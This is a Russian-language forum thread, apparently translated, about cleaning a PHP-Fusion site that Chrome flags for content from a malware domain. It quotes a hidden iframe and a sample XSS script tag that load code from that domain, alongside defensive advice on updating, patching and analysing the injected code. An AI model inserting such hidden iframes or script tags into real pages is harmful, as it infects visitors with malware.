У некоторых моих друзей есть веб-сайт (www.kennelsoffie.dk), и я пытаюсь помочь им, когда возникают какие-либо проблемы. Однако на этот раз я не могу понять. Когда я захожу на сайт с помощью Google Chrome, мне открывается страница с предупреждением о том, что страница, которую я пытаюсь посетить, содержит элементы из stopssse.info.
Я не знаю PHP, поэтому я просто загрузил весь сайт, включая резервные копии базы данных (это файлы .sql). Затем я просмотрел все файлы на предмет stopssse, но ничего не нашел.
Я также протестировал сайт с siteadvisor.com, там написано: «Мы протестировали этот сайт и не обнаружили никаких серьезных проблем».
Может ли PHP скрыть ссылку на сайт вредоносного ПО, чтобы я не смог найти его с помощью простого поиска? Если да, то как его найти?
Я нашел это в сгенерированном источнике
<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">
Он был прямо под тегом body, его нет в фактическом источнике страницы, он добавляется с помощью обфусцированного javascript
изменить: если вы посмотрите на нижнюю часть http://www.kennelsoffie.dk/includes/jscript.js вы увидите действительно странно выглядящую функцию javascript. Это запутанная функция javascript, о которой я вам рассказывал. Это начинается с
function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var
Лучше всего найти и удалить его.
Вы, скорее всего, имеете дело с XSS атаки.
В этом случае два шага:
Если сайт был «заражен» через межсайтовый скриптинг, то у вас, вероятно, есть комментарий, отправленный пользователем, который содержит что-то вроде этого:
<SCRIPT SRC="http://stopssse.info/malware.js"></SCRIPT>
Но обратите внимание, что есть много вариаций эта попытка скрыть факт выполнения внешнего сценария и может также изменить исходный URL, что приведет к сбою вашего простого строкового поиска.
Вредоносное ПО может отсутствовать на сайте, но может исходить из материалов, полученных из внешних источников, например из рекламы.
Версия PHP-Fusion, работающая на сайте, выглядит v6.01.3, что выглядит довольно старой версией, поэтому, вероятно, было бы неплохо обновить ее.
Похоже, было довольно много рекомендаций по безопасности для PHP-Fusion, включая ряд проблем с SQL-инъекциями.
Полный список рекомендаций по PHP-Fusion здесь: http://secunia.com/advisories/product/5291/?task=advisories
Ищите любые странные файлы в настоящих каталогах. Возможно, это файл, который был загружен через незащищенную форму загрузки, которая записывает дополнительные данные в вывод. Попросите друга изменить данные своей учетной записи и начать проверку безопасности своего сайта.
Это там, проверьте файлы PHP (ищите stopssse).
В общем случае при поиске запутанного javascrot часто бывает полезен этот инструмент: Wepawet